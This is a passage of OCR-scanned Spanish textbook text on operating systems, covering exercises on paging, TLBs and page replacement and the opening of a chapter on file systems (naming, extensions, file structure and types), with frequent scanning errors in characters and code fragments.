for (int i = 0; i < N; i - 1 -= paso) X[i] = X[i] -l-1; 

a) Si este programa se ejecuta en una máquina con un tamaño de página de 4 KB y un TLB con 64 
entradas, ¿qué valores de M y N harán que un TLB falle para cada ejecución del ciclo interno? 

b) ¿Sería distinta su respuesta al inciso a) si el ciclo se repitiera muchas veces? Explique. 

8 . La cantidad de espacio en disco que debe estar disponible para el almacenamiento de páginas está 
relacionada con el número máximo de procesos n,, el número de bytes en el espacio de direcciones 
virtual V, así como con el número de bytes de RAM r. Proporcione una expresión para los requeri¬ 
mientos de espacio en disco en el peor de los casos. ¿Qué tan realista es esa cantidad? 

9. Una máquina tiene un espacio de direcciones de 32 bits y una página de 8 KB. La tabla de páginas 
está completamente en el hardware, con una palabra de 32 bits por cada entrada. Cuando se inicia 
un proceso, la tabla de páginas se copia al hardware desde la memoria, una palabra por cada 100 
nseg. Si cada proceso se ejecuta durante 100 mseg (incluyendo el tiempo para cargar la tabla de pá¬ 
ginas), ¿qué fracción del tiempo de la CPU se dedica a cargar las tablas de páginas? 

10 . Suponga que una máquina tiene direcciones virtuales de 48 bits y direcciones físicas de 32 bits. 

a) Si las páginas son de 4 KB, ¿Cuántas entradas hay en la tabla de páginas si sólo hay un nivel? 
Explique. 
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b) Suponga que el mismo sistema tiene un TLB (Búfer de traducción adelantada) con 32 entradas. 
Además, suponga que un programa contiene instrucciones que caben en una página y lee secuen- 
cialmente elementos enteros largos de un arreglo que abarca miles de páginas. ¿Qué tan efecti¬ 
vo será el TLB para este caso? 

11 . Suponga que una máquina tiene direcciones virtuales de 38 bits y direcciones físicas de 32 bits. 

a) ¿Cuál es la principal ventaja de una tabla de páginas de multinivel sobre una tabla de páginas de 
un solo nivel? 

b) Con una tabla de páginas de dos niveles, páginas de 16 K B y entradas de 4 bytes, ¿cuántos bits 
se deben asignar para el campo de la tabla de páginas de nivel superior y cuántos para el campo de 
la tabla de páginas del siguiente nivel? Explique. 

12 . U na computadora con una dirección de 32 bits utiliza una tabla de páginas de dos niveles. Las di¬ 
recciones virtuales se dividen en un campo déla tabla de páginas de nivel superior de 9 bits, un cam¬ 
po de la tabla de páginas de segundo nivel de 11 bits y un desplazamiento. ¿Qué tan grandes son las 
páginas y cuántas hay en el espacio de direcciones? 

13 . Suponga que una dirección virtual de 32 bits se divide en cuatro campos: a, b, c y d. Los primeros 
tres se utilizan para un sistema de tablas de páginas de tres niveles. El cuarto campo (d) es el des¬ 
plazamiento. ¿Depende el número de páginas de los tamaños de los cuatro campos? Si no es así, 
¿cuáles importan y cuáles no? 

14 . U na computadora tiene direcciones virtuales de 32 bits y páginas de 4 KB. El programa y los datos 
caben juntos en la página más baja (O a 4095). La pila cabe en la página más alta. ¿Cuántas entra¬ 
das se necesitan en la tabla de páginas si se utiliza la paginación tradicional (un nivel)? ¿Cuántas en¬ 
tradas en la tabla de páginas se necesitan para la paginación de dos niveles, con 10 bits en cada 
parte? 

15 . U na computadora cuyos procesos tienen 1024 páginas en sus espacios de direcciones mantiene sus 
tablas de páginas en memoria. La sobrecarga requerida para leer una palabra de la tabla de páginas 
es 5 nseg. Para reducir esta sobrecarga, la computadora tiene un TLB que contiene 32 pares (pági¬ 
na virtual, marco de página física) y puede realizar una búsqueda en 1 nseg. ¿Qué proporción de 
aciertos necesita para reducir la sobrecarga promedio a 2 nseg? 

16 . El TLB en la VAX no contiene un bit R. ¿Por qué? 

17 . ¿Cómo puede implementarse en hardware el dispositivo de memoria asociativa necesario para im- 
plementar una TLB y cuáles son las implicaciones de dicho diseño para que sea expandidle? 

18 . U na máquina tiene direcciones virtuales de 48 bits y direcciones físicas de 32 bits. Las páginas son 
de 8 KB. ¿Cuántas entradas se necesitan para la tabla de páginas? 

19 . U na computadora con una página de 8 KB, una memoria principal de 256 KB y un espacio de di¬ 
recciones virtuales de 64 GB utiliza una tabla de páginas invertida para implementar su memoria 
virtual. ¿Qué tan grande debe ser la tabla de hash para asegurar una cadena de hash de una longitud 
promedio menor a 1? Suponga que el tamaño de la tabla de hash es una potencia de dos. 

20 . U n estudiante en un curso de diseño de compiladores propone al profesor un proyecto de escribir un 
compilador que produzca una lista de referencias a páginas que se puedan utilizar para implemen¬ 
tar el algoritmo de reemplazo de páginas óptimo. ¿Es esto posible? ¿Por qué sí o por qué no? ¿Hay 
algo que pudiera hacerse para mejorar la eficiencia de la paginación en tiempo de ejecución? 
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21 . Suponga que el flujo de referencia de páginas virtuaies contiene repeticiones de iargas secuencias de 

referencias a páginas, seguidas ocasionaimente por una referencia a una página aieatoria. Por ejem- 
pio, ia secuencia 0,1. 511, 431, 0,1. 511, 332, 0,1,... consiste en repeticiones de ia secuen¬ 
cia 0,1.511 seguida de una referencia aieatoria a ias páginas 431 y 332. 

a) ¿Por qué no serían efectivos ios aigoritmos de sustitución estándar (LRU, PIFO, Reioj) ai manejar 
esta carga de trabajo para una asignación de página quesea menor que ia iongitud de ia secuencia? 

b) Si a este programa se ie asignaran 500 marcos de página, describa un método de sustitución de 
página que tenga un rendimiento mucho mejor que ios aigoritmos LRU,FIFOoReioj. 

22 . Si se utiiiza ei aigoritmo FIFO de reempiazo de páginas con cuatro marcos de página y ocho pági¬ 
nas, ¿cuántos faiios de página ocurrirán con ia cadena de referencia 0172327103 si ios cuatro mar¬ 
cos están vacíos ai principio? Ahora repita este probiema para ei aigoritmo LRU. 

23 . Considere ia secuencia de páginas de ia figura 3-15(b). Suponga que ios bits R para ias páginas de 
iaB aiaA son 11011011, respectivamente, ¿Cuái página ei i minará ei aigoritmo de segunda oportu¬ 
nidad? 

24 . Una pequeña computadora tiene cuatro marcos de página. En ei primer puiso de reioj, ios bits R son 
0111 (ia página 0 es 0, ei resto son 1). En ios siguientes puisos de reioj, ios vaiores son 1011,1010, 
1101, 0010, 1010, 1100 y 0001. Si se utiiiza ei aigoritmo de envejecimiento con un contador de 8 
bits, proporcione ios vaiores de ios cuatro contadores después dei úitimo puiso. 

25 . Dé un ejempio simpie de una secuencia de referencias a páginas en donde ia primera página seiec- 
cionada para ia sustitución sea diferente para ios aigoritmos de reempiazo de páginas de reioj y 
LRU. Suponga que a un proceso se ie asignan 3 marcos y que ia cadena de referencia contiene nú¬ 
meros de página dei conjunto 0,1, 2, 3. 

26 . En ei aigoritmo WSCiock de ia figura 3-21(c), ia maneciiia apunta a una página con R = 0. Si 
T = 400, ¿se ei i minará esta página? ¿Qué pasa si x = 1000? 

27 . ¿Cuánto tiempo se requiere para cargar un programa de 64 KB de un disco cuyo tiempo de búsque¬ 
da promedio es de 10 mseg, cuyo tiempo de rotación es de 10 mseg y cuyas pistas contienen 32 K B 

a) para un tamaño de página de 2 KB? 

b) para un tamaño de página de 4 KB? 

Las páginas están esparcidas de manera aieatoria ai rededor dei disco y ei número deciiindros están 
grande que ia probabiiidad de que dos páginas se encuentren en ei mismo ciiindro es insignificante. 

28 . Una computadora tiene cuatro marcos de página. Ei tiempo de carga, tiempo dei úitimo acceso y ios 
bits R y M para cada página se muestran a continuación (ios tiempos están en puisos de reioj): 


Página 

Cargada 

Última referencia 

R 

M 

O 

126 

280 

1 

0 

1 

230 

265 

0 

1 

2 

140 

270 

0 

0 

3 

110 

285 

1 

1 
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a) ¿Cuál página reemplazará el algoritmo NRU? 

b) ¿Cuál página reemplazará el algoritmo PIFO? 

c) ¿Cuál página reemplazará el algoritmo LRU? 

d) ¿Cuál página reemplazará el algoritmo de segunda oportunidad? 

29 . Considere el siguiente arreglo bidimensional: 
intX[64][64]: 

Suponga que un sistema tiene cuatro marcos de página y que cada marco es de 128 palabras (un en¬ 
tero ocupa una palabra). Los programas que manipulan el arreglo X caben exactamente en una pá¬ 
gina y siempre ocupan la página 0. Los datos se intercambian hacia dentro y hacia fuera de los otros 
tres marcos. El arreglo X se almacena en orden de importancia por filas (es decir, X[0][1] va des¬ 
pués deX[0][0] en la memoria). ¿Cuál de los dos fragmentos de código que se muestran a continua¬ 
ción generarán el menor número de fallos de página? Explique y calcule el número total de fallos 
de página. 

Fragmento A 

for (int j = 0; j < 64; j-i--i-) 
fordnti = 0; i <64; i-t-h) X[i][j] = 0; 

Fragmento B 

for (int i = 0; i < 64; i-l--t-) 
fordntj = 0:j <64; j-t-h) X[i][j] = 0; 

30 . U na de las primeras máquinas de tiempo compartido (la PDP-1) tenía una memoria de4K palabras 
de 18 bits. Contenía un proceso a la vez en la memoria. Cuando el planificador de proceso decidía 
ejecutar otro proceso, el proceso en memoria se escribía en un tambor de paginación, con 4K pala¬ 
bras de 18 bits alrededor de la circunferencia del tambor, el cual podía empezar a escribir (o leer) 
en cualquier palabra, en vez de hacerlo sólo en la palabra 0. ¿Supone usted que este tambor fue se¬ 
leccionado? 

31 . U na computadora proporciona a cada proceso 65,536 bytes de espacio de direcciones, dividido en 
páginas de 4096 bytes. U n programa específico tiene un tamaño de texto de 32,768 bytes, un tama¬ 
ño de datos de 16,386 bytes y un tamaño de pila de 15,870 bytes. ¿Cabrá este programa en el espa¬ 
cio de direcciones? Si el tamaño de página fuera de 512 bytes, ¿cabría? Recuerde que una página no 
puede contener partes de dos segmentos distintos. 

32 . ¿Puede una página estar en dos conjuntos de trabajo al mismo tiempo? Explique. 

33 . Se ha observado que el número de instrucciones ejecutadas entre fallos de página es directamente 
proporcional al número de marcos de página asignados a un programa. Si la memoria disponible se 
duplica, el intervalo promedio entre los fallos de página también se duplica. Suponga que una ins¬ 
trucción normal requiere 1 microsegundo, pero si ocurre un fallo de página, requiere 2001 pseg (es 
decir, 2 mseg para hacerse cargo del fallo). Si un programa requiere 60 segundos para ejecutarse, 
tiempo durante el cual obtiene 15,000 fallos de página, ¿cuánto tiempo requeriría para ejecutarse si 
hubiera disponible el doble de memoria? 

34 . Un grupo de diseñadores de sistemas operativos para la Compañía de Computadoras Frugal están 
ideando maneras de reducir la cantidad de almacenamiento de respaldo necesario en su nuevo sis¬ 
tema operativo. El jefe de ellos ha sugerido que no se deben preocupar por guardar el texto del pro¬ 
grama en el área de intercambio, sino sólo paginarla directamente desde el archivo binario cada vez 
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que se necesite. ¿Bajo qué condiciones, si las hay, funciona esta idea para el texto del programa? 
¿Bajo qué condiciones, si las hay, funciona para los datos? 

35 . Una instrucción en lenguaje máquina para cargar una palabra de 32 bits en un registro contiene la 
dirección de 32 bits de la palabra que se va a cargar. ¿Cuál es el número máximo de fallos de pági¬ 
na que puede provocar esta instrucción? 

36 . Cuando se utilizan la segmentación y la paginación, como en M U LTICS, primero se debe buscar el 
descriptor del segmento y después el descriptor de página. ¿Funciona el TLB también de esta ma¬ 
nera, con dos niveles de búsqueda? 

37 . Consideremos un programa que tiene los dos segmentos que se muestran a continuación, los cuales 
consisten de instrucciones en el segmento 0 y datos de lectura/escritura en el segmento 1. El seg¬ 
mento 0 tiene protección de lectura/ejecución y el segmento 1 tiene protección de lectura/escritura. 
El sistema de memoria es un sistema de memoria virtual con paginación bajo demanda, con direc¬ 
ciones virtuales que tienen un número de página de 4 bits y un desplazamiento de 10 bits. Las ta¬ 
blas de páginas y la protección son las siguientes (todos los números en la tabla están en decimal): 


Segmento 0 

Segmento 1 

Lectura; 

ejecución 

Lee tur 

a/escritura 

#de página virtual 

#de marco 
de página 

#delpágina virtual 

#de marco 
de página 

0 

2 

0 

En disco 

1 

En disco 

1 

14 

2 

11 

2 

9 

3 

5 

3 

6 

4 

En disco 

4 

En disco 

5 

En disco 

5 

13 

6 

4 

6 

8 

7 

3 

7 

12 


Para cada uno de los siguientes casos, proporcione la dirección de memoria real (actual) que resul¬ 
ta de la traducción de direcciones dinámicas o identifique el tipo de fallo que ocurre (ya sea fallo de 
página o de protección). 

a) Obtener del segmento 1, página 1, desplazamiento 3 

b) A Imacenar en segmento 0, página 0, desplazamiento 16 

c) Obtener del segmento 1, página 4, desplazamiento 28 

d) Saltar a la ubicación en el segmento 1, página 3, desplazamiento 32 

38 . ¿Puede pensar en alguna situación en donde el soporte de la memoria virtual fuera una mala idea y 
qué se ganaría al no tener que soportar la memoria virtual? Explique. 

39 . Trace un histograma y calcule la media y la mediana de los tamaños de los archivos binarios ejecu¬ 
tables en una computadora a la que tenga acceso. En un sistema Windows, analice todos los archi¬ 
vos .exe y .dll; en un sistema UNIX analice todos los archivos ejecutables en /bin, /usr/bin y 
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/local/bin que no sean secuencias de comandos (o utilice la herramienta file para buscar todos los 
ejecutables). Determine el tamaño de página óptimo para esta computadora, considerando sólo el 
código (no los datos). Considere la fragmentación interna y el tamaño delatadla de páginas, hacien¬ 
do alguna suposición razonable acerca del tamaño de una entrada en la tabla de páginas. Suponga 
que todos los programas tienen la misma probabilidad de ejecutarse, y por ende deben considerarse 
con el mismo peso. 

40 . Los pequeños programas para M S-DOS se pueden compilar como archivos .COM. Estos archivos 
siempre se cargan en la dirección 0x100 en un solo segmento de memoria que se utilice para códi¬ 
go, datos y pila. Las instrucciones que transfieren el control de la ejecución, como J MP y CALL, 
o que acceden a datos estáticos desde direcciones fijas hacen que las instrucciones se compilen en 
el código objeto. Escriba un programa que pueda reubicar dicho archivo de programa para ejecutar¬ 
lo empezando en una dirección arbitraria. Su programa debe explorar el código en busca de códigos 
objeto para instrucciones que hagan referencia a direcciones de memoria fijas, después debe modi¬ 
ficar esas direcciones que apunten a ubicaciones de memoria dentro del rango a reubicar. Encontra¬ 
rá los códigos objeto en un libro de programación en lenguaje ensamblador. Tenga en cuenta que 
hacer esto perfectamente sin información adicional es, en general, una tarea imposible debido a que 
ciertas palabras de datos pueden tener valores similares a los códigos objeto de las instrucciones. 

41 . Escriba un programa que simule un sistema de paginación utilizando el algoritmo de envejecimien¬ 
to. El número de marcos de página es un parámetro. La secuencia de referencias a páginas debe leer¬ 
se de un archivo. Para un archivo de entrada dado, dibuje el número de fallos de página por cada 
1000 referencias a memoria como una función del número de marcos de página disponibles. 

42 . Escriba un programa para demostrar el efecto de los fallos del TLB en el tiempo de acceso efectivo 
a la memoria, midiendo el tiempo por cada acceso que se requiere para recorrer un arreglo extenso. 

a) Explique los conceptos principales detrás del programa y describa lo que espera que muestre la 
salida para alguna arquitectura de memoria virtual práctica. 

b) Ejecute el programa en una computadora y explique qué tan bien se ajustan los datos a sus ex¬ 
pectativas. 

c) Repita la parte b) pero para una computadora más antigua con una arquitectura distinta y expli¬ 
que cualquier diferencia importante en la salida. 

43 . Escriba un programa que demuestre la diferencia entre el uso de una política de reemplazo de 
páginas local y una global para el caso simple de dos procesos. Necesitará una rutina que pueda ge¬ 
nerar una cadena de referencias a páginas basado en un modelo estadístico. Este modelo tiene N es¬ 
tados enumerados de 0 a N-1, los cuales representan cada una de las posibles referencias a páginas 
y una probabilidad p, asociada con cada estado i que represente la probabilidad de que la siguiente 
referencia sea a la misma página. En caso contrario, la siguiente referencia a una página será a una 
de las otras páginas con igual probabilidad. 

a) Demuestre que la rutina de generación de la cadena de referencias a páginas se comporta en for¬ 
ma apropiada para cierta N pequeña. 

b) Calcule la proporción de fallos de página para un pequeño ejemplo en el que hay un proceso y 
un número fijo de marcos de página. Explique por qué es correcto el comportamiento. 

c) Repita la parte b) con dos procesos con secuencias de referencias a páginas independientes, y el 
doble de marcos de página que en la parte (b). 

d) Repita la parte c) utilizando una política global en vez de una local. Además, compare la propor¬ 
ción de fallos de página por proceso con la del método de política local. 
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Todas las aplicaciones de computadora requieren almacenar y recuperar información. M ientras un 
proceso está en ejecución, puede almacenar una cantidad limitada de información dentro de su pro¬ 
pio espacio de direcciones. Sin embargo, la capacidad de almacenamiento está restringida por el ta¬ 
maño del espacio de direcciones virtuales. Para algunas aplicaciones este tamaño es adecuado: para 
otras, tales como las de reservaciones en aerolíneas, las bancarias o las de contabilidad corporativa, 
puede ser demasiado pequeño. 

Un segundo problema relacionado con el mantenimiento de la información dentro del espacio de 
direcciones de un proceso es que cuando el proceso termina, la información se pierde. Para muchas 
aplicaciones (por ejemplo, una base de datos) la información se debe retener durante semanas, meses 
o incluso indefinidamente. Es inaceptable que esta información se desvanezca cuando el proceso que 
la utiliza termine. Además, no debe desaparecer si una falla en la computadora acaba con el proceso. 

U n tercer problema es que frecuentemente es necesario que varios procesos accedan a (partes de) 
la información al mismo tiempo. Si tenemos un directorio telefónico en línea almacenado dentro del es¬ 
pacio de direcciones de un solo proceso, sólo ese proceso puede tener acceso al directorio. La manera 
de resolver este problema es hacer que la información en sí sea independiente de cualquier proceso. 

En consecuencia, tenemos tres requerimientos esenciales para el almacenamiento de informa¬ 
ción a largo plazo: 

1. Debe ser posible almacenar una cantidad muy grande de información. 

2. La información debe sobrevivir a la terminación del proceso que la utilice. 

3. M últiples procesos deben ser capaces de acceder a la información concurrentemente. 
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Durante muchos años se han utilizado discos magnéticos para este almacenamiento de largo plazo, 
así como cintas y discos ópticos, aunque con un rendimiento mucho menor. En el capítulo 5 estu¬ 
diaremos más sobre los discos, pero por el momento basta con pensar en un disco como una secuen¬ 
cia lineal de bloques de tamaño fijo que admite dos operaciones: 

1. Leer el bloque k. 

2. Escribir el bloque k. 

En realidad hay más, pero con estas dos operaciones podríamos (en principio) resolver el problema 
del almacenamiento a largo plazo. 

Sin embargo, éstas son operaciones muy inconvenientes, en especial en sistemas extensos uti¬ 
lizados por muchas aplicaciones y tal vez varios usuarios (por ejemplo, en un servidor). U ñas cuan¬ 
tas de las preguntas que surgen rápidamente son: 

1. ¿Cómo encontramos la información? 

2. ¿Cómo evitamos que un usuario lea los datos de otro usuario? 

3. ¿Cómo sabemos cuáles bloques están libres? 
y hay muchas más. 

Así como vimos la manera en que el sistema operativo abstrajo el concepto del procesador pa¬ 
ra crear la abstracción de un proceso y el concepto de la memoria física para ofrecer a los procesos 
espacios de direcciones (virtuales), podemos resolver este problema con una nueva abstracción: el 
archivo. En conjunto, las abstracciones de los procesos (e hilos), espacios de direcciones y archivos 
son los conceptos más importantes en relación con los sistemas operativos. Si realmente compren¬ 
de estos tres conceptos de principio a fin, estará preparado para convertirse en un experto en siste¬ 
mas operativos. 

Los archivos son unidades lógicas de información creada por los procesos. En general, un dis¬ 
co contiene miles o incluso millones de archivos independientes. De hecho, si concibe a cada archi¬ 
vo como un tipo de espacio de direcciones, no estará tan alejado de la verdad, excepto porque se 
utilizan para modelar el disco en vez de modelar la RAM . 

Los procesos pueden leer los archivos existentes y crear otros si es necesario. La información que 
se almacena en los archivos debe ser persistente, es decir, no debe ser afectada por la creación y ter¬ 
minación de los procesos. U n archivo debe desaparecer sólo cuando su propietario lo remueve de ma¬ 
nera explícita. Aunque las operaciones para leer y escribir en archivos son las más comunes, existen 
muchas otras, algunas de las cuales examinaremos a continuación. 

Los archivos son administrados por el sistema operativo. La manera en que se estructuran, de¬ 
nominan, abren, utilizan, protegen, implementan y administran son tópicos fundamentales en el di¬ 
seño de sistemas operativos. La parte del sistema operativo que trata con los archivos se conoce 
como sistema de archivos y es el tema de este capítulo. 

Desde el punto de vista del usuario, el aspecto más importante de un sistema de archivos es su 
apariencia: es decir, qué constituye un archivo, cómo se denominan y protegen los archivos qué 
operaciones se permiten con ellos, etcétera. Los detalles acerca de si se utilizan listas enlazadas (li¬ 
gadas) o mapas de bits para llevar la cuenta del almacenamiento libre y cuántos sectores hay en un 
bloque de disco lógico no son de interés, aunque sí de gran importancia para los diseñadores del sis- 
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tema de archivos. Por esta razón hemos estructurado el capítulo en varias secciones: las primeras 
dos están relacionadas con la interfaz del usuario para los archivos y directorios, respectivamente: 
después incluimos un análisis detallado acerca de cómo se implementa y administra el sistema de 
archivos: por último, daremos algunos ejemplos de sistemas de archivos reales. 


4.1 ARCHIVOS 

En las siguientes páginas analizaremos los archivos desde el punto de vista del usuario: es decir, có¬ 
mo se utilizan y qué propiedades tienen. 

4.1.1 Nomenclatura de archivos 

Los archivos son un mecanismo de abstracción. Proporcionan una manera de almacenar informa¬ 
ción en el disco y leerla después. Esto se debe hacer de tal forma que se proteja al usuario de los 
detalles acerca de cómo y dónde se almacena la información y cómo funcionan los discos en rea¬ 
lidad. 

Probablemente, la característica más importante de cualquier mecanismo de abstracción sea la 
manera en que los objetos administrados son denominados, por lo que empezaremos nuestro exa¬ 
men de los sistemas de archivos con el tema de la nomenclatura de los archivos. Cuando un proce¬ 
so crea un archivo le proporciona un nombre. Cuando el proceso termina, el archivo continúa 
existiendo y puede ser utilizado por otros procesos mediante su nombre. 

Las reglas exactas para denominar archivos varían un poco de un sistema a otro, pero todos los 
sistemas operativos actuales permiten cadenas de una a ocho letras como nombres de archivos le¬ 
gales. Por ende, andrea, bruce y cathy son posibles nombres de archivos. Con frecuencia también 
se permiten dígitos y caracteres especiales, por lo que nombres como 2, urgente! y F ig.2-14 son a 
menudo válidos también. M uchos sistemas de archivos admiten nombres de hasta 255 caracteres. 

A Igunos sistemas de archivos diferencian las letras mayúsculas délas minúsculas, mientras que 
otros no. UNIX cae en la primera categoría: M S-DOS en la segunda. Así, un sistema UNIX puede 
tener los siguientes nombres como tres archivos distintos: maria, M aria y MARIA. En M S-DOS, to¬ 
dos estos nombres se refieren al mismo archivo. 

Tal vez sea adecuado hacer en este momento un paréntesis sobre sistemas de archivos. Win¬ 
dows 95 y Windows 98 utilizan el sistema de archivos de M S-DOS conocido como FAT-16 y por 
ende heredan muchas de sus propiedades, como la forma en que se construyen sus nombres. Win¬ 
dows 98 introdujo algunas extensiones a FAT-16, lo cual condujo a FAT-32, pero estos dos sistemas 
son bastante similares. Además, Windows NT, Windows 2000, Windows X P y .WV admiten ambos 
sistemas de archivos FAT, que en realidad ya son obsoletos. Estos cuatro sistemas operativos basa¬ 
dos en NT tienen un sistema de archivos nativo (NTFS) con diferentes propiedades (como los nom¬ 
bres de archivos en Unicode). En este capítulo, cuando hagamos referencia a los sistemas de 
archivos M S-DOS o FAT, estaremos hablando de FAT-16 y FAT-32 como se utilizan en Windows, 
a menos que se especifique lo contrario. M ás adelante en este capítulo analizaremos los sistemas de 
archivos FAT y en el capítulo 11 examinaremos el sistema de archivos NTFS, donde analizaremos 
Windows Vista con detalle. 
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M uchos sistemas operativos aceptan nombres de archivos en dos partes, separadas por un pun¬ 
to, como en prog.c. La parte que va después dei punto se conoce como ia extensión del archivo y 
por io generai indica aigo acerca de su naturaieza. Por ejempio, en M S-DOS, ios nombres de archi¬ 
vos son de 1 a 8 caracteres, más una extensión opcionai de 1 a 3 caracteres. En UNIX el tamaño de 
la extensión (si la hay) es a elección del usuario y un archivo puede incluso tener dos o más exten¬ 
siones, como en paginainicio.html.zip, donde .html indica una página Web en HTM L y .zip indica 
que el archivo se ha comprimido mediante el programa zip. Algunas de las extensiones de archivos 
más comunes y sus significados se muestran en la figura 4-1. 


Extensión 

Significado 

archivo.bak 

Archivo de respaido 

archivo.c 

Programa fuente en C 

archivo.gif 

Imagen en Formato de Intercambio de Gráficos de CompuServe 

archivo.hip 

Archivo de ayuda 

archivo.htmi 

Documento en ei Lenguaje de Marcación de Hipertexto de Worid Wide Web 

archivo.jpg 

Imagen fija codificada con ei estándar] PEG 

archivo.mp3 

Música codificada en formato de audio MPEG capa 3 

archivo.mpg 

Peiícuia codificada con ei estándar MPEG 

archivo .0 

Archivo objeto (producido porei compiiador, no se ha eniazado todavía) 

archivo.pdf 

Archivo en Formato de Documento Portabie 

archivo.ps 

Archivo de PostScript 

archivo.tex 

Entrada para ei programa formateadorTEX 

archivo.txt 

Archivo de texto generai 

archivo.zip 

Archivo comprimido 


Figura 4-1. A Igunas extensiones de archivos comunes. 


En algunos sistemas (como UNIX) las extensiones de archivo son sólo convenciones y no son 
impuestas por los sistemas operativos. Un archivo llamado archivo.txt podría ser algún tipo de ar¬ 
chivo de texto, pero ese nombre es más un recordatorio para el propietario que un medio para trans¬ 
portar información a la computadora. Por otro lado, un compilador de C podría insistir que los 
archivos que va a compilar terminen con .c y podría rehusarse a compilarlos si no tienen esa termi¬ 
nación. 

Las convenciones como ésta son especialmente útiles cuando el mismo programa puede mane¬ 
jar diferentes tipos de archivos. Por ejemplo, el compilador C puede recibir una lista de varios ar¬ 
chivos para compilarlos y enlazarlos, algunos de ellos archivos de C y otros archivos de lenguaje 
ensamblador. Entonces, la extensión se vuelve esencial para que el compilador sepa cuáles son ar¬ 
chivos de C, cuáles son archivos de lenguaje ensamblador y cuáles son archivos de otro tipo. 

Por el contrario, Windows está consciente de las extensiones y les asigna significado. Los usua¬ 
rios (o procesos) pueden registrar extensiones con el sistema operativo y especificar para cada una 
cuál programa "posee" esa extensión. Cuando un usuario hace doble clic sobre un nombre de archi¬ 
vo, el programa asignado a su extensión de archivo se inicia con el archivo como parámetro. Por 
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ejemplo, al hacer doble clic en archivo.doc se inicia M icrosoft Word con archivo.doc como el ar¬ 
chivo inicial a editar. 

4.1.2 E structura de archivos 

Los archivos se pueden estructurar en una de varias formas. Tres posibilidades comunes se descri¬ 
ben en la figura 4-2. El archivo en la figura 4-2(a) es una secuencia de bytes sin estructura: el sis¬ 
tema operativo no sabe, ni le importa, qué hay en el archivo. Todo lo que ve son bytes. Cualquier 
significado debe ser impuesto por los programas a nivel usuario. Tanto UN IX como Windows uti¬ 
lizan esta metodología. 


1 Byte 1 Registro 



(a) (b) (c) 

Figura 4-2. Tres tipos de archivos, (a) Secuencia de bytes. (b) Secuencia de registros, 
(c) Árbol. 


Hacer que el sistema operativo considere los archivos sólo como secuencias de bytes provee la 
máxima flexibilidad. Los programas de usuario pueden colocar cualquier cosa que quieran en sus 
archivos y denominarlos de cualquier manera conveniente. El sistema operativo no ayuda, pero 
tampoco estorba. Para los usuarios que desean realizar cosas inusuales, esto último puede ser muy 
importante. Todas las versiones de UNIX, M S-DOS y Windows utilizan este modelo de archivos. 

La primera configuración en la estructura se muestra en la figura 4-2(b). En este modelo, un ar¬ 
chivo es una secuencia de registros de longitud fija, cada uno con cierta estructura interna. El con¬ 
cepto central para la idea de que un archivo sea una secuencia de registros es la idea de que la 
operación de lectura devuelva un registro y la operación de escritura sobrescriba o agregue un re¬ 
gistro. Como nota histórica, hace algunas décadas, cuando reinaba la tarjeta perforada de 80 colum¬ 
nas, muchos sistemas operativos de mainframes basaban sus sistemas de archivos en archivos 
consistentes de registros de 80 caracteres: es decir, en imágenes de la tarjeta. Estos sistemas tam¬ 
bién admitían archivos con registros de 132 caracteres, que fueron destinados para la impresora de 
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línea (que en esos días eran grandes impresoras de cadena con 132 columnas). Los programas leían 
la entrada en unidades de 80 caracteres y la escribían en unidades de 132 caracteres, aunque los úl¬ 
timos 52 podían ser espacios, desde luego. Ningún sistema de propósito general déla actualidad uti¬ 
liza ya este modelo como su sistema de archivos primario, pero en aquellos días de las tarjetas 
perforadas de 80 columnas y del papel de impresora de línea de 132 caracteres, éste era un modelo 
común en las computadoras mainframe. 

El tercer tipo de estructura de archivo se muestra en la figura 4-2(c). En esta organización, un 
archivo consiste de un árbol de registros, donde no todos son necesariamente de la misma longitud: 
cada uno de ellos contiene un campo llave en una posición fija dentro del registro. El árbol se or¬ 
dena con base en el campo llave para permitir una búsqueda rápida por una llave específica. 

La operación básica aquí no es obtener el "siguiente" registro, aunque eso también es posible, 
sino obtener el registro con una llave específica. Para el archivo del zoológico de la figura 4-2(c), 
podríamos pedir al sistema que, por ejemplo, obtenga el registro cuya llave sea pony, sin preocu¬ 
parnos acerca de su posición exacta en el archivo. Además, se pueden agregar nuevos registros al 
archivo, con el sistema operativo, y no el usuario, decidiendo dónde colocarlos. Evidentemente, es¬ 
te tipo de archivos es bastante distinto de los flujos de bytes sin estructura que se usan en UNIX y 
Windows, pero se utiliza de manera amplia en las grandes computadoras mainframe que aún se 
emplean en algún procesamiento de datos comerciales. 

4.1.3 Tipos de archivos 

M uchos sistemas operativos soportan varios tipos de archivos. Por ejemplo, UNIX y Windows tie¬ 
nen archivos y directorios regulares. UNIX también tiene archivos especiales de caracteres y de blo¬ 
ques. Los archivos regulares son los que contienen información del usuario. Todos los archivos de 
la figura 4-2 son archivos regulares. Los directorios son sistemas de archivos para mantener la 
estructura del sistema de archivos. Estudiaremos los directorios un poco más adelante. Los archi¬ 
vos especiales de caracteres se relacionan con la entrada/salida y se utilizan para modelar dispo¬ 
sitivos de E/S en serie, tales como terminales, impresoras y redes. Los archivos especiales de 
bloques se utilizan para modelar discos. En este capítulo estaremos interesados principalmente en 
los archivos regulares. 

Por lo general, los archivos regulares son archivosASCII o binarios. Los archivosASCII con¬ 
sisten en líneas de texto. En algunos sistemas, cada línea se termina con un carácter de retorno de 
carro. En otros se utiliza el carácter de avance de línea. Algunos sistemas (por ejemplo, M S-DOS) 
utilizan ambos. No todas las líneas necesitan ser de la misma longitud. 

La gran ventaja de los archivosASCII es que se pueden mostrar e imprimir como están, y se 
pueden editar con cualquier editor de texto. Además, si muchos programas utilizan archivosASCII 
para entrada y salida, es fácil conectar la salida de un programa con la entrada de otro, como en las 
canalizaciones de shell. (La plomería entre procesos no es más fácil, pero la interpretación de la in¬ 
formación lo es si una convención estándar, tal como ASCII, se utiliza para expresarla). 

Otros archivos son binarios, lo cual sólo significa que no son archivosASCII. Al listarlos en la 
impresora aparece un listado incomprensible de caracteres. Por lo general tienen cierta estructura 
interna conocida para los programas que los utilizan. 
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Por ejemplo, en la figura 4-3(a) vemos un archivo binario ejecutabie simpie tomado de una de 
ias primeras versiones de UNIX .Aunque técnicamente ei archivo es sóio una secuencia de bytes, 
ei sistema operativo sóio ejecutará un archivo si tiene ei formato apropiado. Este archivo tiene cin¬ 
co secciones: encabezado, texto, datos, bits de reubicación y tabia de símboios. Ei encabezado em¬ 
pieza con un supuesto número mágico, que identifica ai archivo como un archivo ejecutabie (para 
evitar ia ejecución accidentai de un archivo que no tenga este formato). Después vienen ios tama¬ 
ños de ias diversas partes dei archivo, ia dirección en ia que empieza ia ejecución y aigunos bits de 
